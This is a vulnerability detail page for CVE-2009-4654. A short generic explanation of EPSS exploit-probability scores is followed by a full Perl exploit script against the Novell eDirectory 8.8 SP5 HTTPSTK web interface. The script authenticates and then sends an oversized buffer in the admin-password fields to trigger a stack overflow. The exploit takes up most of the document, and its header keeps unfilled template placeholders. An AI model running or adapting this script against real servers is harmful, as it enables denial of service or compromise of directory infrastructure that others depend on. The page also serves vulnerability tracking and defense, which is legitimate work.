CVE-2009-4654 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

# Exploit Title: Novell eDirectory HTTPSTK Login Stack Overflow Vulnerability # Date: 2009-11-17 # Author: karak0rsan # Software Link: [downoad link if available] # Version: Novell eDirectory 8.8 SP5 HTTPSTK # Tested on: [relevant os] # Code : [exploit code] #!usr\bin\perl # Novell eDirectory 8.8 SP5 HTTPSTK BoF Vuln - 0day # Vulnerability found in Hellcode Labs. # karak0rsan || murderkey # info[at]hellcode.net || www.hellcode.net use WWW::Mechanize; use LWP::Debug qw(+); use HTTP::Cookies; use HTTP::Request::Common;; $target=$ARGV[0]; if(!$ARGV[0]){ print "Novell eDirectory 8.8 SP5 Exploit\n"; print "Hellcode Research || Hellcode.net\n"; print "Usage:perl $0 [target]\n"; exit(); } print "Username:"; $username = <STDIN>; chomp($username); print "Password:"; $password = <STDIN>; chomp($password); $login_url = "$target/_LOGIN_SERVER_"; $url = "$target/dhost/httpstk;submit"; $buffer = "\x41" x 476; my $mechanize = WWW::Mechanize->new(); $mechanize->cookie_jar(HTTP::Cookies->new(file => "$cookie_file",autosave => 1)); $mechanize->timeout($url_timeout); $res = $mechanize->request(HTTP::Request->new('GET', "$login_url")); $mechanize->submit_form( form_name => "authenticator", fields => { usr => $username, pwd => $password}, button => 'Login'); $res2 = $mechanize->request(HTTP::Request->new('GET', "$url")); $res2 = $mechanize->request(POST "$url", [sadminpwd => $buffer, verifypwd => $buffer]);